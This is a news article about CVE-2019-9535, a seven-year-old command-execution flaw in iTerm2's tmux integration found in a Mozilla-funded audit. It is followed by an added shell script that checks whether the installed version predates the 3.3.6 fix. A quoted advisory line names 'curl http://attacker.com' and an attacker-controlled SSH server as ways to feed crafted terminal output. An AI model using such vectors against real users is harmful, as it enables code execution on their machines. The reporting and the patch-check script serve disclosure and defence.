Patch now, Mac users: Critical 7-year-old flaw in open-source macOS app iTerm2

iTerm2 whips out patch after a Mozilla-sponsored audit turns up an ancient critical flaw.
Written by Liam Tung, Contributing Writer

The makers of iTerm2, a popular open-source terminal emulator app for macOS, have released a patch to address a critical flaw discovered during an audit sponsored by Firefox-maker Mozilla. 

Judging by Mozilla's description, any developers or admins using the iTerm2 app should install the available patch immediately: the bug could be exploited in ways not yet known.

"An attacker who can produce output to the terminal can, in many cases, execute commands on the user's computer," Mozilla's Tom Ritter writes.

"Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples." 


The bug was found in the tmux integration feature of iTerm2, where it's been lurking for seven years. 

Mozilla opted to support the audit of iTerm2 because of its popularity with developers and admins, funding the audit from the Mozilla Open Source Support Program (MOSS). The audit was carried out by not-for-profit security consultancy Radically Open Security. MOSS has also supported the Tor Project, Tails, and whistleblower tip system SecureDrop.   

iTerm2 serves the same purpose as the native Terminal macOS app for those who use the command line. 

Mozilla notes that the vulnerability, which has been assigned the identifier CVE-2019-9535, does require some user interaction to exploit. But because it can be triggered by output from ordinary commands, it is potentially dangerous.

"This is a serious security issue because in some circumstances it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2," iTerm2 developers explain in a note urging users to update.

The fix is available in version 3.3.6 of iTerm2, which was released on October 9, a few days after a separate update that does not address the flaw.
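For anyone managing a fleet of developer Macs, the practical follow-up is confirming that every installed copy is at or above the fixed release named above. The POSIX shell script below is an added example, not code from the article, from Mozilla or from the iTerm2 project: it compares a dotted version string against 3.3.6 and, when run on macOS, reads the installed version from the app bundle. It assumes the default bundle path /Applications/iTerm.app and the standard CFBundleShortVersionString key in its Info.plist; both are assumptions, not facts stated in the article.

```shell
#!/bin/sh
# Added example (not from the article or the iTerm2 project): flag an installed
# iTerm2 older than 3.3.6, the release the article names as fixing CVE-2019-9535.
# Assumed: app bundle at /Applications/iTerm.app and CFBundleShortVersionString
# present in its Info.plist (standard macOS bundle layout).

FIXED_VERSION="3.3.6"

# version_lt A B -> exit 0 when dotted version A is older than B, 1 otherwise.
# Components are compared numerically, so 3.10.0 sorts after 3.3.6; any
# non-numeric suffix on a component (e.g. "6beta1") is dropped and the
# component is treated as its numeric base.
version_lt() {
    a="$1."
    b="$2."
    while [ -n "$a" ] || [ -n "$b" ]; do
        x=${a%%.*}; a=${a#*.}
        y=${b%%.*}; b=${b#*.}
        x=${x%%[!0-9]*}; y=${y%%[!0-9]*}   # strip trailing non-digits
        x=${x:-0}; y=${y:-0}               # missing component counts as 0
        if [ "$x" -lt "$y" ]; then return 0; fi
        if [ "$x" -gt "$y" ]; then return 1; fi
    done
    return 1   # equal
}

# is_pre_fix VERSION -> exit 0 when VERSION predates the fixed release.
is_pre_fix() {
    version_lt "$1" "$FIXED_VERSION"
}

# main [PLIST] -> reads the installed version and reports; exit 1 if outdated,
# 2 if the check could not be performed (not macOS, or app not found).
main() {
    plist="${1:-/Applications/iTerm.app/Contents/Info.plist}"
    if ! command -v defaults >/dev/null 2>&1; then
        echo "defaults(1) not available; this check only runs on macOS" >&2
        return 2
    fi
    installed=$(defaults read "$plist" CFBundleShortVersionString 2>/dev/null) || {
        echo "iTerm2 not found at $plist" >&2
        return 2
    }
    if is_pre_fix "$installed"; then
        echo "iTerm2 $installed is older than $FIXED_VERSION: update for CVE-2019-9535"
        return 1
    fi
    echo "iTerm2 $installed includes the CVE-2019-9535 fix"
    return 0
}

# Run the live check only when invoked as: sh check_iterm2.sh check [PLIST]
# so the functions can also be sourced by other scripts.
if [ "${1:-}" = "check" ]; then
    main "${2:-}"
fi
```

The exit codes are deliberate: 1 means "update now", 2 means "could not verify", so the script drops straight into a configuration-management or MDM compliance job without parsing its output.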

iTerm2's audit was sponsored by the third tranche of the MOSS, which Mozilla created after the 2014 disclosure of Heartbleed, the bug in OpenSSL, a widely used open-source library for protecting communications between browsers and websites.
